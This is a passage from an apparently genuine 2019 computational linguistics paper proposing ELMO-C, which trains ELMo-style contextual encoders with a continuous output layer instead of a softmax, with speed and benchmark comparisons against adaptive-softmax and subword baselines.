larger corpus with tens or hundreds of billions of tokens. In this work, we explore how to accelerate contextual representation learning. We identify the softmax layer as the primary cause of inefficiency. This component takes up a considerable portion of all trainable parameters (80% for ELMo) and consumes a huge amount of training time. However, it is often not needed in the final model as the goal of contextual representation learning is to build a generic encoder. Therefore, it is rather a waste to allocate extensive computational resources to the softmax layer. Inspired by Kumar and Tsvetkov (2019), we con- sider learning contextual representation models with continuous outputs. In the training process, the contextual encoder is learned by minimizing the distance between its output and a pre-trained target word embedding. The constant time com- plexity and small memory footprint of the output layer perfectly serve our desire to decouple learn- ing contexts and words and devote most com- putational resources to the contextual encoder. In addition, we combine the approach with open- vocabulary word embeddings such that the model can be trained without the need to pre-define a 1https://github.com/allenai/bilm-tf/ issues/55. 611 Transactions of the Association for Computational Linguistics, vol. 7, pp. 611–624, 2019. https://doi.org/10.1162/tacl a 00289 Action Editor: Luke Zettlemoyer. Submission batch: 1/2019; Revision batch: 6/2019; Published 9/2019. c© 2019 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00289 by Carnegie Mellon University user on 06 April 2021 https://github.com/allenai/bilm-tf/issues/55 https://github.com/allenai/bilm-tf/issues/55 https://doi.org/10.1162/tacl_a_00289 closed word set as the vocabulary. We also provide an alternative interpretation of learning contextual encoders with continuous outputs that sheds light on how the pre-trained embedding could affect the performance of the model. We conduct a comprehensive empirical study to analyze the proposed approach and several existing methods that are originally proposed to reduce the complexity of the output layer in lan- guage models, such as the adaptive softmax, and the sub-word methods. We incorporate these ap- proaches with ELMo and conduct a comprehen- sive study to compare them in terms of training speed and performance on five downstream tasks. We demonstrate that the proposed approach ef- fectively reduces the training time and trainable parameters while maintaining competitive perfor- mance compared with the baselines. Our approach also exhibits consistent computational advanxtage under different conditions (e.g., with different vo- cabulary sizes, with different sentence encoders, and with different number of GPUs). Source code is available athttps://github. com/uclanlp/ELMO-C. 2 Background and Related Work Contextual representation We review contex- tual representation models from two aspects: how they are trained and how they are used in downstream tasks. CoVe (McCann et al., 2017) uses the source lan- guage encoder from a machine translation model as a contextual representation model. Peters et al. (2018a) advocate for the use of larger unlabelled corpora and proposes ELMo, a forward and a back- ward LSTM-based (Hochreiter and Schmidhuber, 1997) language model, whereas GPT (Radford et al., 2018) and GPT-2 (Radford et al., 2019) build a language model with the Transformer (Vaswani et al., 2017). BERT (Devlin et al., 2019) intro- duces the masked language model and provides deep bidirectional representation. There are two existing strategies for applying pre-trained contextual representations to down- stream tasks: 1) feature-based and 2) fine-tuning. In the feature-based approach, fixed features are extracted from the contextual encoder (e.g., ELMo, CoVe) and inserted as an input into a task-specific model. In the fine-tuning approach, the contextual encoder is designed as a part of the network architecture for downstream tasks, and its parameters are fine-tuned with the down- stream task. BERT is designed for the fine-tuning approach but it is also evaluated with the feature- based approach. GPT-2 is a scaled-up version of GPT and exhibits strong performance under zero-shot settings. Speeding up language models training Con- siderable efforts have been devoted to accelerat- ing the training process of language models. One line of research focuses on developing faster sequence encoder architectures such as CNN (Kim et al., 2016; Dauphin et al., 2017), QRNN (Bradbury et al., 2016), SRU (Lei et al., 2018), and the Transformer (Vaswani et al., 2017). These architectures have been extensively used for learning language representations (Radford et al., 2018; Devlin et al., 2019; Tang et al., 2018). Another line of work focuses on the large- vocabulary issue, as a large and ever-growing vo- cabulary results in an intractable softmax layer. Our work falls into the second line and we review existing solutions in detail. Several studies for language modeling focus on directly reducing the complexity of the soft- max layer. Following Kumar and Tsvetkov (2019), we group them into two categories: sampling- based approximations and structural approxima- tions. Sampling-based approximations include the sampled softmax (Bengio et al., 2003) and NCE (Mnih and Teh, 2012). The sampled softmax ap- proximates the normalization term of softmax by sampling a subset of negative targets, and NCE replaces the softmax with a binary classifier. On the other hand, structural approximations such as the hierarchical softmax (Morin and Bengio, 2005) and the adaptive softmax (Grave et al., 2016), form a structural hierarchy to avoid expensive nor- malization. The adaptive softmax, in particular, groups words in the vocabulary into either a short- list or clusters of rare words. For frequent words, a softmax over the short-list would suffice, which reduces computation and memory usage signifi- cantly. The adaptive softmax has been shown to achieve results close to those of the full softmax while maintaining high GPU efficiency (Merity et al., 2018). Regarding contextual representation models, ELMo used the sampled softmax and GPT and BERT resorted to a subword method. Specifi- cally, they used WordPiece (Wu et al., 2016) or BPE (Sennrich et al., 2016) to split the words into 612 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00289 by Carnegie Mellon University user on 06 April 2021 https://github.com/uclanlp/ELMO-C https://github.com/uclanlp/ELMO-C subwords and the language models were trained to take subwords as input and also predict sub- words. This method is efficient and scalable, as the subword vocabulary can be kept small. One potential drawback of these subword-level lan- guage models, however, is that they produce rep- resentations for fragments of words. Therefore, it takes extra effort to generate word-level repre- sentations (see the discussion in Section 4.2). The high cost of the softmax layer has also been noted in the sentence representation learning literature. Following the success of Word2Vec (Mikolov et al., 2013), methods such as SkipThought (Kiros et al., 2015) have been developed to learn distributed sentence representations by predicting the context sentences of a given sentence, which involves sequentially decoding words of the target sentences. Jernite et al. (2017) and Logeswaran and Lee (2018) notice the inefficiency of the softmax layer during decoding and propose to use discriminative instead of generative objectives, eliminating the need for decoding. However, these approaches are not directly applicable to contex- tual representation learning. 3 Approach A contextual representation model, at its core, is a language model pre-trained on a large unlabeled corpus. In the following, we review the objective of language models and the architectures of exist- ing contextual representation models. We then introduce the proposed model. Language model objective Given a set of text sequences as the training corpus, we can construct a collection of word-context pairs (w, c), and the goal of a language model is to predict the word w based on the context c. In a forward language model, the context c is defined as the previous words in the sequence, whereas for a backward language model, the context of a word is defined as the following words. For a masked language model, some words in the input sentence are masked (e.g., replaced by a [MASK] token) and the objective is to predict the masked words from the remainder. Different contextual representa- tion models optimize different objectives. For example, ELMo trains a forward and backward language model and BERT trains a masked- language model. Model architecture A typical neural language model consists of three parts: 1) an input layer, 2) a sequence encoder, and 3) a softmax layer. Given a word-context pair (w, c), the input layer uses a word embedding or a character-CNN model (Kim et al., 2016) to convert the input words in c into word vectors. Then the sequence encoder embeds the context into a context vector c ∈ Rm using a multi-layer LSTM (Hochreiter and Schmidhuber, 1997), a Gated CNN (Dauphin et al., 2017), or a Transformer (Vaswani et al., 2017). The softmax layer then multiplies the context vector c with an output word embedding2 W ∈ RV ×m and uses a softmax function to produce a conditional distribution p(w|c) over the vocabulary of size V . In a language model, the learning objective l(w, c) for (w, c) is then expressed as: l(w, c) = − log p(w|c) = − log softmax(cW T ) = −c · w + log ∑ w′ exp(c · w′), (1) where w ∈ Rm is a row from W corresponding to the target word w and the second term sums over the vocabulary. After the model is trained, the contextual representations are generated from the latent states of the sequence encoder. For example, ELMo combines the hidden states of the LSTMs to generate contextualized word embedding for each word in a sentence. We refer the reader to Peters et al. (2018a) for details. Note that the size of W and the computational complexity of the second term in Eq. (1) scale linearly to the vocabulary size, V . Therefore, when V is large, the softmax layer becomes the speed bottleneck. Our approach The scaling issue of softmax also occurs in other language generation and sequence- to-sequence models. In the literature, several ap- proaches have been proposed to approximate the softmax layer or bypass it with a subword method (see Section 2). Recently, Kumar and Tsvetkov (2019) propose to treat the context vector as con- tinuous outputs and directly minimize the distance 2The dimension of the original output from the sequence encoder may not match the dimension of the output word embedding. In that case, a projection layer is added after the original sequence encoder to ensure that the two dimensions match. 613 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00289 by Carnegie Mellon University user on 06 April 2021 between the context vector and the pre-trained word embedding associated with the target word, l(w, c) = d(c, w) (2) The distance function l could be the L2 distance ‖c − w‖2, the cosine distance c·w ‖c‖‖w‖ or a prob- abilistic distance metric. We argue that the idea of learning with con- tinuous outputs particularly suits contextual rep- resentation learning. As the goal is to obtain a strong contextual encoder, it makes sense to use a pre-trained output word embedding and decouple learning the contextual encoder and the output embedding. In the remainder of this section, we discuss the computational efficiency of the pro- posed approach and its combination with the open- vocabulary word embedding. We also provide an alternative way to interpret training contextual en- coders with continuous outputs. 3.1 Computational Efficiency The continuous output layer has a reduced arith- metic complexity and trainable parameter size. We illustrate these improvements and how they contribute to reducing the overall training time of a contextual representation model in the following. For comparison, we include the sampled softmax, the adaptive softmax, and the subword method in the discussion. 3.1.1 Learning with Continue Outputs Arithmetic complexity The arithmetic com- plexity (i.e., FLOPs) of evaluating loss with con- tinue outputs (i.e., Eq. 2) takes O(m), as we only need to calculate the distance between two m-dimensional vectors. The complexity of the sampled softmax is proportional to the number of negative samples per batch. When the vocabulary is huge, a large number of negative samples are needed (Jozefowicz et al., 2016). For the adaptive softmax, the time complexity is determined by the capacities of the short-list and the rare-word clus- ters, which grows sub-linearly to the vocabulary size. The complexity of the subword method is determined by the subword vocabulary size. In contrast, the time spent on the continuous output layer and loss evaluation remains constant with respect to the vocabulary size and is negligible. Trainable parameter size The output word embedding usually takes up a huge part of the parameters of a language model. For example, the softmax layer in ELMo trained on the One Billion Word Benchmark (Chelba et al., 2013) takes up more than 80% of the trainable parameters of the entire model. Even if an approximation such as the sampled softmax is used, the number of trainable parameters is not reduced. Approaches like the adaptive softmax reduce the dimension of softmax embedding for rare words, the trainable parameter size of which is effectively reduced but still remains sizable. For a model trained on the same corpus (Grave et al., 2016), the adaptive softmax still amounts to 240 million parameters whereas the sequence encoder has only around 50 million parameters. On the contrary, we learn a contextual encoder with Eq. (2) using a pre- trained word embedding, reducing the trainable parameters besides the encoder from tens or hun- dreds of millions to zero. 3.1.2 Overall Training Time We now discuss how the efficiency improvements to the output layer contribute to the reduction of the overall training time, in the context of synchronous stochastic gradient descent training on multiple GPUs. In general, the following three factors determine the training time. Arithmetic complexity The arithmetic com- plexity of a model includes the complexity of the forward and backward propagation on the in- put layer, the sequence encoder, and the output layer. It also includes the overhead of the opti- mization algorithm such as gradient clipping and model updates. The complexity of this optimiza- tion overhead is often proportional to the number of parameters that need updating. With the con- tinuous output layer, not only the arithmetic com- plexity but also the optimization overhead are reduced. GPU memory consumption The training time is also affected by GPU memory consumption, as less GPU memory consumption leads to larger batch size. For the same amount of data and hard- ware resource, larger batch size means better parallelism and less training time. Our approach exhibits small GPU memory footprints, due to reductions of the arithmetic complexity (with fewer intermediate results to keep) and trainable parameter size (with fewer parameters to store). As a result, training with continuous outputs is 2 to 4 times more memory-efficient than with the softmax layer (see Section 5.2). 614 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00289 by Carnegie Mellon University user on 06 April 2021 Note that as the output word embedding is fixed, we can keep that embedding in the main memory and only load the required part to the GPU memory. Despite the fact that this comes with an overhead of moving part of the output word embedding from CPU to GPU memory at each iteration, the benefit of parallelism often dominates over the communication overhead on mainstream hardware, where the GPU memory is often comparatively limited. We also note that larger batch size may lead to difficulty in opti- mization. Several methods have been developed to ease the large-batch training issue (Goyal et al., 2017; You et al., 2018). We show that these meth- ods are sufficient for resolving the optimization difficulty in our experiment (Section 4). Communication cost To train large neural net- work models, using multiple GPUs almost becomes a necessity. In addition, one way to scale up current systems is to increase the number of GPUs used. In such cases, the communication cost across GPUs needs to be taken into consideration. The cost occurs from synchronizing the parameters and their gradients across GPUs, which is proportional to the size of parameters that need to be updated. For the sampled softmax, due to the use of the sparse gradient, the communication cost is pro- portional to the number of the sampled words. For the adaptive softmax and the subword language model, the communication cost is proportional to the trainable parameter size. The continuous output layer, on the other hand, incurs little com- munication cost across GPUs. 3.2 Open-Vocabulary Training We utilize the open-vocabulary word embedding as both the input and output layer embedding. Open- vocabulary word embeddings, such as the FastText embedding and the MIMICK model (Pinter et al., 2017), utilize character or subword information to provide word embeddings. They could represent an unlimited number of words with a fixed number of parameters. As a result, we can train contextual encoders with an open vocabulary, which means we do not need to pre-define a closed word set as the vocabulary and the model can be trained on any sequences of words. Open-vocabulary input layer To be easily ap- plied in various tasks, the contextual encoder usu- ally has an open-vocabulary input layer. ELMo uses a character-CNN but it is relatively slow. Thus we use a pre-trained open-vocabulary word embedding as the input layer of the contextual encoder, reducing the time complexity of the input layer to a negligible level. This also aligns with the main spirit of our approach, which is to spend computational resources on the most important part, the sequence encoder. Open-vocabulary output layer For the soft- max layer, including efficient variants such as the adaptive softmax, the output vocabulary has to be pre-defined so that the normalization term can be calculated. As the softmax layer’s arithmetic complexity and parameter size grow when the vo- cabulary size grows, the vocabulary is often trun- cated to avoid expensive computation. With the continuous output layer, we can con- duct training on an arbitrary sequence of words, as long as the output embedding for those words can be derived. This can be achieved by using the open-vocabulary embedding. This feature is espe- cially attractive if we are training on domains or languages with a long-tail word distribution such as the biomedical domain, where truncating the vocabulary may not be acceptable. 3.3 Interpretation of Learning Contextual Encoders with Continuous Outputs In the following, we justify the intuition behind learning with continue outputs and discuss how the pre-trained word embedding affects the per- formance of the model. Language models are essentially modeling the word-context conditional probability matrix, that is, A ∈ RN×V where Ac,w = p(w|c), N is the number of all possible contexts, and V is the vocabulary size (Levy and Goldberg, 2014; Yang et al., 2017). The continuous output layer can be viewed as modeling A after using the word embedding as a projection matrix. To illustrate this, consider the global objective of the layer with the cosine distance:3 L = ∑ (w,c) #(w, c)l(w, c) = − ∑ (w,c) #(w, c)c · w = − ∑ c #(c)c· ∑ w p(w|c)w, = − ∑ c #(c)c· ∑ w Ac,ww, 3For simplicity, we take the cosine distance as a running example but the conclusions hold for other distance functions. 615 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00289 by Carnegie Mellon University user on 06 April 2021 Model Input Sequence Encoder Output ELMO CNN LSTM Sampled Softmax ELMO-C (OURS) FASTTEXTCC LSTM w/ LN CONT w/ FASTTEXTCC ELMO-A FASTTEXTCC LSTM w/ LN Adaptive Softmax ELMO-Sub Subword LSTM w/ LN Softmax ELMO-CONEB FASTTEXTONEB LSTM w/ LN CONT w/ FASTTEXTONEB ELMO-CRND FASTTEXTCC LSTM w/ LN CONT w/ Random Embedding ELMO-CCNN Trained CNN LSTM w/ LN CONT w/ Trained CNN ELMO-CCNN-CC Trained CNN LSTM w/ LN CONT w/ FASTTEXTCC ELMO-CCC-CNN FASTTEXTCC LSTM w/ LN CONT w/ Trained CNN Table 1: Specifications of variants of ELMo models compared in Sections 4 and 5. CONT means the model has continuous outputs. LN means layer normalization. where #(w, c) is the number of occurrences of the pair (w, c) in the corpus. We assume all vectors (c and w) are normalized. To optimize the inner product between c and∑ w p(w|c)w, we essentially align the direction of context vector c with the expected word vector under context c, ∑ w p(w|c)w = Ew∼p(w|c)w. In other words, given a word embedding matrix W ∈ RV ×d, our approach aligns c with the cor- responding row (AW )c,: in AW . Therefore, the ob- jective can be viewed as conducting multivariate regression to approximate (AW )c,: given the context. Based on this view, the performance of the contextual representation model depends on how much information of the original matrix A is preserved after projection with W . In the spirit of PCA (Jolliffe, 2011), to keep the variance of A, we would like to have (AW )c,: and (AW )c′,: distant from each other if c and c′ are very different. Therefore, a pre-trained word embedding, which projects words with different meanings into different positions in space, is a natural choice for the projection matrix W and can help preserve much of the variance of A. 4 Experiment We accelerate ELMo with the proposed approach and show that the resulting model ELMO-C is computationally efficient and maintains competi- tive performance, compared to the original ELMo model (ELMO), an ELMo variant with the adap- tive softmax (ELMO-A4), and another variant with the subword method (ELMO-Sub). 4We include ELMO-A instead of a model with sampled softmax because the adaptive softmax has been shown to have superior performance (Grave et al., 2016). 4.1 Setup Models In the following, we introduce the mod- els in detail. Table 1 provides a summary. The original ELMo consists of a character-CNN as the input layer, a forward and backward LSTM with projection as the sequence encoder, and a sampled softmax as the output layer. Adagrad (Duchi et al., 2011) is used as the optimizer. We conduct experiments using the reimplementation of ELMO in AllenNLP (Gardner et al., 2018) and build the others upon it. The key difference between ELMO-C and ELMO is that ELMO-C produces continuous outputs and we train it with the cosine distance loss. A FastText embedding trained on Common Crawl (Mikolov et al., 2017) (FASTTEXTCC) is used as the output embedding. Based on preliminary experiments, we also make three minor changes: 1) we use FASTTEXTCC as the input layer as it is more efficient than the character-CNN model; 2) we add a layer norm (Ba et al., 2016) after the projection layer of the LSTM to improve the convergence speed; 3) we use Adam with the learning rate schedule from Chen et al. (2018) to help training with a large batch size. Our main goal is to study how different output layers affect the training speed and performance, which cannot be achieved by just comparing ELMO-C and ELMO, due to the aforementioned minor changes to ELMO-C. Therefore, we intro- duce two additional baseline models (ELMO-A and ELMO-Sub), which differ from ELMO-C in a minimal way. Specifically, their sequence en- coders and training recipes are kept the same as ELMO-C. Thus ELMO-C, ELMO-A, and ELMO-Sub can be directly compared. 616 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00289 by Carnegie Mellon University user on 06 April 2021 ELMOORG BASE FASTTEXTCC ELMO ELMO-A ELMO-Sub ELMO-C Time − − − 14 x 3 5.7 x 4 3.9 x 4 2.5 x 4 Batch − − − 128 256 320 768 Params − − − 499M 196M 92M 76M SNLI 88.7 88.0 87.7 88.5 88.9 87.1 88.8 Coref NA NA 68.90 72.9 72.9 72.4 72.9 SST-5 54.7 51.4 51.30 ± 0.77 52.96 ± 2.26 53.58 ± 0.77 53.02 ± 2.08 53.80 ± 0.73 NER 92.22 90.15 90.97 ± 0.43 92.51 ± 0.28 92.28 ± 0.20 92.17 ± 0.56 92.24 ± 0.10 SRL 84.6 81.4 80.2 83.4 82.7 82.4 82.4 Table 2: Computational efficiency of the main competing models and their performance on five NLP benchmarks. Time is the overall training time in Days x Cards format. Batch is the maximal batch size per card. Params is the number of trainable parameters in millions. Due to the small test sizes for NER and SST-5, we report mean and standard deviation across three runs. Our approach (ELMO-C) exhibits better computational efficiency and shows comparable performance compared with ELMO, ELMO-A, and ELMO-Sub. ELMO-A uses the adaptive softmax as its output layer. We carefully choose the hyper-parameters of the adaptive softmax to obtain an efficient yet strong baseline. It has only half of the parameters of the one reported in Grave et al. (2016) but achieves a perplexity of 35.8, lower than ELMO’s 39.7. ELMO-Sub takes subwords as input and also predicts subwords. Thus, unlike other models, its vocabulary consists of around 30,000 subwords created using BPE (Sennrich et al., 2016). For this reason, a lookup-table-style embedding rather than FASTTEXTCC is used as its input layer and a vanilla softmax is used as its output layer. Its input and output word embedding are tied and trained from scratch. For reference, we also list the results of ELMo and the baseline reported in Peters et al. (2018a) as ELMOORG and BASE. However, these models are evaluated using different configurations. Finally, we also include FASTTEXTCC a (non-contextual) word embedding model, as another baseline. All contextual representation models are trained on the One Billion Word Benchmark for 10 epochs and the experiments are conducted on a workstation with 8 GeForce GTX 1080Ti GPUs, 40 Intel Xeon E5 CPUs, and 128G main memory. Downstream benchmarks We follow Peters et al. (2018a) and use the feature-based approach to evaluate contextual representations on down- stream benchmarks. ELMo was evaluated on six benchmarks and we conduct evaluations on five of them. SQuAD (Rajpurkar et al., 2016) is not available for implementation reasons.5 In the following, we briefly review the benchmarks and task-specific models. For details please refer to Peters et al. (2018a). • SNLI (Bowman et al., 2015): The textual entailment task seeks to determine whether a ‘‘hypothesis’’ can be entailed from a ‘‘premise’’. The task-specific model is ESIM (Chen et al., 2017). • Coref: Coreference resolution is the task of clustering mentions in text that refer to the same underlying entities. The data set is from CoNLL 2012 shared task (Pradhan et al., 2012) and the model is from Lee et al. (2018). Note that we use an improved version of the Coref system (Lee et al., 2017) used in Peters et al. (2018a). • SST-5 (Socher et al., 2013): The task in- volves selecting one of five labels to describe a sentence from a movie review. We use the BCN model from McCann et al. (2017). • NER: The CoNLL 2003 NER task (Sang and De Meulder, 2003) consists of newswire from the Reuters RCV1 corpus tagged with four different entity types. The model is a biLSTM-CRF from Peters et al. (2018a), similar to Collobert et al. (2011). • SRL: Semantic role labeling models the predicate-argument structure of a sentence. It 5The SQuAD experiment in Peters et al. (2018a) was conducted with an implementation in TensorFlow. The experiment setting is not currently available in AllenNLP (https://github.com/allenai/allennlp/ pull/1626), nor can it be easily replicated in PyTorch. 617 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00289 by Carnegie Mellon University user on 06 April 2021 https://github.com/allenai/allennlp/pull/1626 https://github.com/allenai/allennlp/pull/1626 seeks to answer ‘‘Who did what to whom’’. The model is from He et al. (2017) and the data set is from Pradhan et al. (2013). For SNLI, SST-5, NER, and SRL, we use the same downstream models as in Peters et al. (2018a) re-implemented in AllenNLP.6 For Coref, Peters et al. (2018a) uses the model from Lee et al. (2017) and we use an improved model (Lee et al., 2018) from the same authors. For all the tasks, the hyper-parameters are tuned to maximize the performance for the original ELMo and all models are tested under the same configurations. 4.2 Main Results We report the main results in Table 2. Our ap- proach (ELMO-C) enjoys a substantial compu- tational advantage while maintaining competitive or even superior performance, compared to ELMO, ELMO-A, and ELMO-Sub. Model efficiency For model efficiency, the statistics of ELMO is reported by the original authors and they use three GTX 1080 Tis. We train ELMO-A, ELMO-Sub, and ELMO-C using four GTX 1080 Tis. Roughly speaking, compared with ELMO, ELMO-C is 4.2x faster and 6x more memory-efficient. To give a clear view of the speedup the CONT layer brings, we compare ELMO-C with ELMO-A. ELMO-A differs from ELMO-C only in the output layer. Still, ELMO- C has a 2.28x speed advantage and is 3x more memory-efficient. Compared with ELMO-Sub, our approach holds a 1.56x speed advantage and is 2x more memory-efficient. The results here only show the overall efficiency of our approach under the setting of ELMo and a detailed analysis of the efficiency is desirable, which we provide in Section 5.2. Performance on downstream tasks ELMO-C works especially well on semantic-centric tasks, such as SNLI, Coref, and SST-5. However, for tasks that required a certain level of syntactic information, such as NER and SRL (He et al., 2018), ELMO-C suffers from slight performance degradation compared with ELMO, but it remains competitive with ELMO-A and ELMO-Sub. We suspect that the performance degradation is related to the pre-trained embedding and conduct further analysis in Section 5.1. 6For SRL, the score reported by AllenNLP is lower than the score reported by CoNLL official script. In addition, we notice that the performance of ELMO-Sub is unstable. It shows satisfying per- formance on SST-5, NER, and SRL. However, it lags behind on Coref and even fails to outper- form FASTTEXTcc on SNLI. ELMO-Sub provides subword-level contextual representations, which we suspect could be the cause of unstable perfor- mance. Specifically, to get the representation for a word in evaluation on word-level tasks, we follow Devlin et al. (2019) to use the representation of its first subword. This could be sub-optimal if precise word-level representation is desired (e.g., the suf- fix of a word is an important feature). These results are consistent with the observation in Kitaev and Klein (2018). They find that special design has to be made to apply BERT to constituency parsing because of the subword segmentation. However, we notice that the scope of our experiment is lim- ited. It is likely that when ELMO-Sub is scaled up or used with the fine-tuning method, the afore- mentioned issue is alleviated—we leave that to future work. 5 Analysis We conduct analysis regarding the effect of the pre-trained word embedding on the performance of the contextual encoder. We also investigate the contributions of different factors to the overall training time and study the speedup of our ap- proach under various conditions. 5.1 Effect of the Pre-trained Embedding We show the effect of the pre-trained embedding by introducing several variants of ELMO-C (sum- marized in Table 1) and list their performance in Table 3. Quality of the pre-trained embedding We aim to understand how the quality of the pre- trained output word embedding W affects the performance of the contextual encoder. To study this, we train a FastText word embedding on the One Billion Word Benchmark, a much smaller corpus than Common Crawl. We then train an ELMO-C variant, ELMO-CONEB , by using this em- bedding in the input and output layers. Com- paring it to ELMO-C, ELMO-CONEB holds up surprisingly well and it is competitive on SNLI, Coref, and SST-5 while being inferior on NER and SRL. This motivates us to take a step further and use a completely random output word embedding. 618 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00289 by Carnegie Mellon University user on 06 April 2021 Task ELMO-C ELMO-CONEB ELMO-CRND ELMO-CCNN ELMO-CCNN-CC ELMO-CCC-CNN SNLI 88.8 88.4 88.4 88.2 88.0 88.4 Coref 72.9 73.0 72.4 72.9 72.8 72.6 SST-5 53.80 ± 0.73 52.70 ± 0.90 53.01 ± 1.67 53.38 ± 0.68 54.33 ± 1.26 54.16 ± 0.96 NER 92.24 ± 0.10 92.03 ± 0.47 91.99 ± 0.35 92.24 ± 0.36 92.04 ± 0.33 91.93 ± 0.53 SRL 82.4 82.2 82.9 82.8 83.4 83.3 Table 3: Performance of ablation models on five NLP benchmarks. ELMO-C is included for reference. We replace the output embedding of ELMO-C with a random embedding matrix, of which each element is randomly drawn from a standard normal distribution. We denote this model as ELMO-CRND. We find that this model performs well (Table 3), with only a mild performance drop compared to ELMO-C. The performance of ELMO-CRND shows the robustness of the proposed approach and demonstrates that the deep LSTM is expressive enough to fit a complex output space. However, we find that the pre-trained input word embedding is still indispensable because using a randomly initialized input embedding would lead to brittle performance (e.g., 85.8 on SNLI). Pre-trained CNN layer as word embedding In Section 4, we observed that models using Fast- Text embedding (ELMO-C and ELMO-A) as input performed worse than ELMo on SRL, a task relying heavily on syntactic information. We suspect that the FastText embedding is weaker on capturing syntactic information than the character-CNN trained in ELMo (Peters et al., 2018b). To verify this, we train ELMO-C using the trained CNN layer from ELMo as the input layer (ELMO-CCNN-CC) or the output embedding (ELMO-CCC-CNN). We observe that the two models exhibit notably better performance on SRL (see Table 3). We also consider a ELMO-CCNN model, which uses the CNN layer as both the input and output embedding. On SRL, ELMO-CCNN per- forms favorably compared to ELMO-C but slightly worse than ELMO-CCNN-CC or ELMO-CCC-CNN. We suspect that this is because ELMO-CCNN-CC and ELMO-CCC-CNN benefit from different kinds of embeddings in the input layer and the output layer. 5.2 Computational Efficiency Next, we study the computational efficiency of the continuous output layer against several baselines from two aspects. First, in Section 3.1, we dis- cussed three factors governing the overall training time of the model: 1) arithmetic complexity, 2) GPU memory consumption, and 3) communica- tion cost. We aim to study how each factor affects the overall training time of each model. Second, in the above experiments, we focus on ELMo with the LSTM as the sequence encoder. We wonder whether the continuous output layer can deliver attractive speedup for sequence encoders of different types and sizes. We investigate the continuous output layer (CONT) and three common baseline output layers: 1) the subword-level language model (SUBWORD), 2) the adaptive softmax layer (ADAPTIVE), and 3) the sampled softmax layer (SAMPLED). Addition- ally, we include a variant of the sampled softmax denoted as FIXED where the output word embed- ding is initialized by the FastText embedding and fixed during the training. This output layer is similar to a special case of CONT with a ranking loss, where the model encourages its output to be close to the target word embedding but far from a negative sample. In total, we study five different output layers. For several output layers, the trade-off between computational efficiency and model performance is controlled by their hyper-parameters. We choose hyper-parameters close to those reported in the literature to strike a balance between speed and performance. 5.2.1 Speedup Breakdown We pair the five different output layers with the same input layer (fixed word embedding) and sequence encoder (ELMo’s LSTM with projec- tion). We then test the training speed of these models under three scenarios, which are designed to reflect the individual effect of the arithmetic complexity, the GPU memory consumption, and the communication cost: • S1 (small batch): We use one GPU card and set the batch size to be 1. The asynchronous execution feature of the GPU is disabled. The time needed to finish one batch is reported. 619 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00289 by Carnegie Mellon University user on 06 April 2021 Vocab Params Batch S1 (small batch) S2 (large batch) S3 (multiple GPUs) CONT ∞ 76M 640 0.47s 115.28s 34.58s FIXED ∞ 76M 512 1.17x 1.24x 1.24x SUBWORD ∞ 92M 320 1.09x 1.53x 1.55x ADAPTIVE 40K 97M 384 1.08x 1.30x 1.34x 800K 196M 256 1.16x 1.47x 1.89x 2000K 213M 192 1.25x 1.82x 2.49x SAMPLED 40K 96M 512 1.07x 1.18x 1.30x 800K 483M 256 1.15x 1.35x 1.91x 2000K 1102M 64 1.16x 2.35x 16.09x Table 4: Statistics on the computation efficiency of different models. For CONT, we report the actual training time in seconds. For other models, we report the relative training time compared to CONT. Params: Number of trainable parameters of the whole model in millions. Batch: Maximal batch size per card. • S2 (large batch): We use one GPU card and the maximal batch size. The time needed to finish training on one million words for each model is reported. • S3 (multiple GPUs): We use 4 GPU cards and the maximal batch size. The time needed to finish training on one million words for each model is reported. In Table 4, we report the training speed of the models under each scenario.7 In addition, we report the parameter size and the maximal batch size on one GPU card. For ADAPTIVE and SAMPLED, the vocabulary size also affects the training speed so we test them under three different vocabulary sizes:8 40K, 800K, and 2,000K. Arithmetic complexity The arithmetic com- plexity of the models is reflected by the speed under S1, where the GPU memory is always abundant and the arithmetic complexity is the dominating factor. CONT holds a mild advan- tage (1.07x-1.25x) over baseline models, which is expected because the LSTM layers in ELMo 7CONT under S3 is slightly slower than the ELMO-C model reported in Section 4.2. This is because when training the ELMO-C model reported in 4.2, we actually train a forward ELMO-C on two cards and train a backward ELMO-C on two other cards, which reduces the communication cost by half. This optimization is only applicable to our approach in the setting of ELMo and does not work for other baseline methods. In this experiment, we disable this optimization for generosity. 8The 2,000K vocabulary is created on the tokenized 250- billion-word Common Crawl corpus (Panchenko et al., 2017), which covers words that appear more than 397 times. are quite slow and that undermines the advantage of the continuous output layer. For ELMO-Sub, the small yet non-negligible softmax layer adds overhead to the arithmetic complexity. FIXED, ADAPTIVE, and SAMPLED have similar arithmetic complexity but ADAPTIVE has the highest com- plexity when the vocabulary size is large (e.g., 2,000K). GPU memory consumption The effect of GPU memory consumption can be observed by comparing the statistics under S1 and S2. The difference between S2 and S1 is that the parallel computing of the GPU is fully utilized. For CONT, its great GPU memory efficiency helps it gain larger speedup under S2, especially against common baselines such as SUBWORD, ADAPTIVE, and SAMPLED. For ELMO-Sub, in addition to the overhead from the softmax layer, breaking words into subwords leads to longer sequences, which increases the training time by 1.1x. Thus it is 1.53x slower than CONT under S2. SAMPLED suffers from its huge parameter size and exhibits poor scalability with respect to the vocabulary size (2.35x slower when the vocabulary size reaches 2,000K). Communication cost The effect of the com- munication cost across GPUs can be observed by comparing the statistics under S2 and S3. As the communication cost and GPU memory consumption both are highly dependent on the parameter size, the observations are similar. 620 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00289 by Carnegie Mellon University user on 06 April 2021 LSTM LSTMX2 TRANS BASE ELMO TRANS LARGE GPT CONT 3.97s 10.42s 15.87s 34.58s 48.55s 43.53s FIXED 1.93x 1.32x 1.52x 1.24x 1.37x 1.14x SUBWORD 2.32x 1.49x 1.78x 1.55x 1.72x 1.44x ADAPTIVE 4.58x 2.20x 2.62x 1.89x 3.28x 2.33x SAMPLED 2.50x 1.60x 2.91x 1.91x OOM 8.31x Table 5: Time needed to finish training on one million words for each model using 4 GPU cards and the maximal batch size. For CONT, we report the actual 